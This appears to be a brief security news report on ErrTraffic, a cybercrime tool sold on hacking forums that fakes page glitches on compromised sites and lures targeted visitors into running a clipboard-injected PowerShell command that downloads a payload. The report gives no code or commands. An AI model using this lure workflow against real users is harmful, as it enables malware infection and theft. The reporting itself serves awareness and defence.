ErrTraffic is a new cybercrime platform first promoted on
Russian-speaking hacking forums earlier this month by someone using the alias LenAI.
The attacker must already control a website that accepts victim traffic, or has injected malicious code into a
legitimate, compromised website, and then add ErrTraffic to it via an HTML line.
The site’s behavior remains the same for regular visitors who do not match the
targeting criteria, but when geolocation and OS fingerprinting conditions are met, the page’s DOM is modified to display a visual glitch.
The
issues may include corrupted or illegible text, font replacement with symbols, fake Chrome updates, or missing system font errors.
This makes the page appear "broken" and creates the condition to provide the victim a 'solution' in the form of installing a browser update, downloading a system font, or pasting something in the command prompt.
If the victim follows the instructions, a
PowerShell command is added to the clipboard by means of JavaScript code. Executing the command leads to downloading a payload.
ErrTraffic clients can define the payload for each targeted architecture and specify the countries that qualify for infection. However, there’s a hardcoded
exclusion for CIS (Commonwealth of
Independent States) countries, which may indicate the origin of ErrTraffic's developer.
A new cybercrime tool called ErrTraffic allows threat actors to automate ClickFix attacks by generating 'fake glitches' on compromised websites to lure users into downloading payloads or following malicious instructions
www.bleepingcomputer.com
